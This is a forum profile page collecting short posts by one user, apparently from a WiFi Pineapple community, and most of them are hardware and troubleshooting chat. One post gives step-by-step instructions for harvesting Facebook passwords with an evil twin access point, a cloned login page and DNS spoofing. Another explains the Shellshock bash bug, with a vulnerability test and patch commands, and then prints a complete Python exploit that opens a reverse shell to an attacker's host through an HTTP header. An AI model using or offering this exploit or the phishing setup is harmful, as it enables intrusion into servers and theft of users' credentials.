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Everything posted by Armaal

  1. If the clients navigator is modern & go to pre-load HSTS (facebook, lastpass, gmail, etc...) -> fail So alternative tips is the following : ->Generate a EvilAP ->Host a twin facebook into /www folder ->Remake the HTML (twin-facebook) original code to call a PHP action with a .txt or sql ->Dnsspof the *.facebook.* (excellent tuto found here hak5 : http://goo.gl/qe4jkx ) ->Check your txt or sql database But I remember that facebook detect an abnormality & say to change the password of the client.
  2. Ok That sounds like a conflict between differents "route" with WLAN 0 & 1 & 2 but reach a reboot system it's not normal. Your WLAN2 it's the : AWUS036NEH ? (I think yes your first post) Could you do : iwconfig wlan2 and paste here ? I'm waiting for a AWUS036NEH (buy in your country!) to France. If your problems is not resolv in few days I think I could help easier stay in touch
  3. BeNe your Pine is hot before the reboot? or strange smells from the plastic ?
  4. The AWUS051NH is able to do injection / monitor also capable of 802.11a but if the PineApple support this chipset I have no response
  5. Thanks I have not seen that topic before ;-)
  6. Stephane Chazelas U.K. @ robotics company SeeByte find a bug in BASH https://securityblog.redhat.com/ A quick test to check if you are vulnerable (debian, ubuntu, unix (FreeBSD).. ) env x='() { :;}; echo vulnerable' bash -c "echo this is a test" if your terminal respond : vulnerable you are vulnerable The problem is the following -> the code continue to execute after the ; -> and here you can inject malicious code ... Also a CGI-TEST wget -U "() { test;};/usr/bin/touch /tmp/VULNERABLE" myserver/cgi-bin/test You have to update your bash by paquets in couple of days CentOS : # yum update bash Debian : # apt-get update bash FreeBSD : # portsnap fetch update https://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025 ------- Example of attack could be perform (in this example a Reverse Shell by http header) #CVE-2014-6271 cgi-bin reverse shell import httplib,urllib,sys if (len(sys.argv)<4): print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0] print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0] exit(0) conn = httplib.HTTPConnection(sys.argv[1]) reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3] headers = {"Content-type": "application/x-www-form-urlencoded", "test":reverse_shell } conn.request("GET",sys.argv[2],headers=headers) res = conn.getresponse() print res.status, res.reason data = res.read() print data
  7. Did you check if you ethernet cable was not bad? (you mention ethernet in your title)
  8. Who is the guy on the link? nice find so
  9. Hey FircusCreak I'm not sure but it's maybe the same path (common Debian system) /etc/dhcp/<*.conf> You can use your favorite editor (like Nano or Vi) I'm going to work on the HSTS problem in 2 weeks. If I find something I'll be back here. Leonardo method are probably the good way.
  10. Hello Sebkinne So I have a question for you : That product could power the Mark V correctly right (Amperage)? the output is : 9-12volt @ 2amp MAX http://goo.gl/M0qmmt (I'm going to buy PineApple today, I'm living in France) Armaal
  11. The pineapple create his own wifi. Then you can "admin it" by any webrowser (I think you already know that) Also you could download a ssh client from de GoogleStore if you don't want to use the web GUI from he MarkV (perhaps the preferred choice for you shema type)
  12. Hello everybody Here a script (python) to perform a fast check if a website have or not a HSTS header. It could be very usefull. For example Lastpass using a HSTS Header with 32 months max age Also you can check with Chrome : <a href="http://imgur.com/dZGq03u"><img src="http://i.imgur.com/dZGq03u.jpg" title="Hosted by imgur.com" /></a> see ya armaal
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